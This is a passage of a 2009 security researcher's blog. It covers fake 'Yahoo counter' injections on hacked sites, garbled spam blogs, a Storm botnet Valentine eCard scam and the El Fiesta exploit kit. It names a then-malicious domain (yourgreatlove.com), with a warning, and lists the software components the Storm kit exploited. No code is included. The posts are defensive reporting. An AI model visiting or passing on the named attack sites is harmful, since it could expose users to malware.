Wednesday, February 25, 2009

It's _not_ a Yahoo counter!

One of the most common complaints we get is when a webmeister or user thinks we're unjustly accusing a website of being evil, and, without sounding immodest about it, we're usually right. The way LinkScanner works is that it makes its evaluations in real time ... it looks at the code as it comes off the webpage, and decides if things are dangerous or not. That's as opposed to those systems that rely on a central database, which is usually too slow to realize that something is dirty, and then too slow to realize it's been cleaned up.


A typical example is the fake Yahoo counter that looks like this ...



That's the source of a typically hacked page. You see the bit about "Yahoo counter starts" ? Guess what... it's _lying_! It actually decrypts to an iframe link to an exploit site, but you wouldn't believe the number of conversations I've had that go like this...

Ring, ring... me, "Hello, could I speak to your webmeister please?"
Shuffle, shuffle, switching thru ... webmeister, "Hello?"
me, "Hi, I'm sorry to have to tell you this, but I'm a security researcher, and I have to tell you that your website has been hacked."
webmeister, "Sorry... what ... who is this?"

and then we have many chats about who I am, and how I know, and eventually it gets to the point where they say "Show me", so I show them the code on their page, and they say "But it's a Yahoo counter!"
and I say "Did you put it in?", and they say, "Well, no, but one of the other guys must have"

:-)

Sometimes they believe me, but mostly they don't.

Here's the bottom line folks. I have yet to see a genuine Yahoo counter. They may exist, but they sure don't look like that, so if you're a webmeister with code like that in your pages, please delete it. Unless you put it there, it's fake.

Keep safe

Roger

Btw, to be notified of blog updates, plus little extra bits that don't make it to the blog, please follow me on twitter

Sunday, February 22, 2009

Off-topic (but I think it's a neat story)

Hi folks, this is completely off-topic, but I've been chewing on this for a few days, and feel I should share it...

A few days ago, I took three of my little girls to ballet, and in the middle of the class, the tornado sirens went off. The teachers got all the kids into the safest place in the building which was a hallway, and got them to sit down... all by the book.

Then the neat part happened...

One end of the hall was sort of open, and faced the windows .... obviously the most dangerous thing if a tornado did hit. Without anyone saying anything, the moms who were waiting for the kids sat between the kids and the windows, and the two dads, (me and another guy) interposed ourselves between the moms and the windows, thus taking the most dangerous spot. No one said anything, or talked about it ... it just all happened naturally.

The parents stayed calm, and the kids stayed calm, and the tornados went south of us, so they went back to ballet, and the parents went back to chatting aimlessly.

About an hour later, I thought about what had happened, and realized that something nice had occured. A bunch of strangers had naturally come together, without anyone saying anything, with the adults protecting the kids, and the men protecting the women.

In these days of terrible economic uncertainty, I found it heart warming to find that the natural inclination of a group of strangers was to protect the weaker ones.

We can, and will pull thru this, folks,

Cheers

Roger

Thursday, February 19, 2009

I didn't say that, I _promise_

Ok, I'll admit it ... I google-alert my name. It's not as bad as it sounds, because I google alert lots of things. It's surprising to see how many people are named Roger Thompson, and it's even mildly amusing to see some of their professions, but that's a story for another day. Today, however, I got this alert...


"Even in spite of this it was a relatively benign episode as worms bearing of walking, Grey Goo is cost note, as it may be only the best ancient of this brand of malware for the future, warn Roger Thompson, CTO of anti-exploit software ..."

Now, I do like the occasional glass of shiraz, but I'm fairly confident that, even after a whole bottle of shiraz, I never said that. Heck, I can't even parse it.

It was in a blog whose identity shall remain private to protect the innocent (which may be all of us in this case), and a quick bit of searching found a second blog that opens with this amazing statement...

"A exotic resistant decisive against protecting computer user and business antagonistic zero-day attack aware to that occurrence exploit belt users' frozen drive launch a interview variation of its opening goods on Monday.", in an interview also attributed to me.

Although it was posted today, it was under a heading of "Antispyware pros launch SocketShield beta", which gives a bit of a clue, because that happened in early 2006, but I'm pretty sure I never said that either.

In fact, both blogs were full of incomprehensible and un-parsable english just like that. It looks like someone is picking up old articles, and translating them to non-English, and then back again... twice or more.

But the question is ... why bother? And my answer is ... I have no clue! What's the point? The blogs don't appear to be malicious as far as I and my software can determine, but who knows what might happen in the future?

As funny as the entries are, I think the best idea is simply regard them as potentially dangerous, and stay away. In other words, if you are googling for _anything_ and the summary that comes up on the search page doesn't make sense.... treat it like a crazy looking stray dog that might bite, and go to a different site.

Stay safe folks!

Roger

PS Please follow me on twitter

Tuesday, February 10, 2009

Storm is dead ... long live storm

Today I looked at a Valentine's Day eCard scam, and it was like unexpectedly bumping into an old friend...


I got this URL, yourgreatlove.com (**** DON"T GO THERE!!!!! IT MIGHT BE STILL LIVE AND DANGEROUS**** ) from the the malwarebytes forum (malwarebytes.org/forums/index.php?showtopic=11109) , and given that it was valentine's day malware, I thought I'd take a closer look, and I saw this screen...





I thought "That's Storm!... Haven't seen that for ages". Now, it might well have been around and I just haven't been paying attention, and I'm pretty sure it's what most people call the Waldec botnet, but it was fun to think "Oh, I know what you are!"

They've updated their crypto and their exploit set, but they still try to trick you into downloading something if the exploits don't get you first, and here's the current exploit list that they throw, hoping something will stick ...

Outlook Application
Vis Studio
MS Dbg Clr
Vis Stuidio DTE
D.Explore
Vis Studio
Microsoft Update Web Control
Outlook Data Object
Business Object Factory
MDAC
NCT Audio File
Yahoo webcam/Messenger - June 2007
Real Player - March 2008
Creative Labs - May 2008
CA List Ctrl
Yahoo webcam - June 2007
Kingsoft update ocx - Apr 2008
MySpace uploader ocx - Feb 2008
WebEx mtg manager - Aug 2008

Of course, if they nail you, you become part of the botnet, as well as giving up your identity and bank account.

Anyway, it was a deja vu moment. These guys show a pretty fair understanding of current events, and US holidays, so the next thing we'll probably see is an Easter version, unless something newsworthy happens... disaster photos of Australian bushfires maybe?

Keep safe folks,

Roger

OFFTOPIC - REQUEST FOR HELP
Folks,
My wife and son have managed to get a song in the final 15 for the annual NSAI Country Music Television awards. This is out of several thousand entries. They have two chances to win. The first is the judged portion, which is conducted by CMT.com themselves, but the second is a public vote. It's a big opportunity for them.

Their song is "I found everything" by Kate and Ben Thompson, and you can vote for them (as often as you'd like) at http://nsai.cmt.com . I've resisted the temptation to enlist a botnet :-) but would like to help them win.

Please consider voting for them, and please ask five of your friends to.

:-)

Thanks in advance

Roger

Thursday, February 5, 2009

Guess what should be blocked next? :-)

*** Warning! DON"T go to any of these sites***

One of the longer-lived attack sites is thedeadpit. This first graphic shows the attack profile, showing a peak of about 1500 hits per day. (You can click any of the images for a larger view)




And then, after a while we started seeing the same stuff come from internetcountercheck. The attack profile shows a recent peak of about 4000 hits in one day. This is kind of interesting, and probably reflects a marketing push on their part.




It turns out that there are five domains on their domain name server, and look ... today the third one is starting too :-) ...





and here are the rest of the domains on the domain server...




So, as you can see, it's a case of three down, two to go. If anyone likes to block URLs, these would be a couple of good ones to add.

Cheers

Roger

Monday, February 2, 2009

Firefox /El Fiesta mystery solved... well, sort of

One the most common attack kits (that we see and block every day) is El Fiesta. It is frequently updated, and according to reports, pretty cheap.... generally a fair formula for success in any part of the software biz. It has a neat statistics page that keeps nice stats like which countries it has seen, and how many successes (or loads) it has managed in each country.



It also tracks the browsers it has seen, and tracks its successes against each browser. At the bottom of the statistics page, it shows how well it has done with each exploit.



The first interesting point here is that it shows 67 loads against FireFox 3.5, which is impressive, and even more interesting is that the summary shows two FF exploits ... a FF NS Local, and a FF Behavior.

This lead us to wonder what they might be, and in particular, just what was the FF Behavior trick?

At first, all we could get it to do was to throw fairly common PDF exploits at FireFox, which all failed, but then, after certain components were updated just right, we suddenly got this screen that wants to update the page....




Now, if you click ok for the update, and then run the update, you get this old friend ...



Gosh, you've got spyware.... whoda thunk it? Now, I'm not saying it's a great trick or anything, but as the stats page shows, it works. Remember, these guys don't want to cut down the apple tree... they just want to shake it, and pick up the apples that fall off.

We'll keep trying to figure out exactly how they're doing it, just for grins, but there are two other mysteries that we stumbled across while trying to solve this one, so we'll see what happens.

Cheers

Roger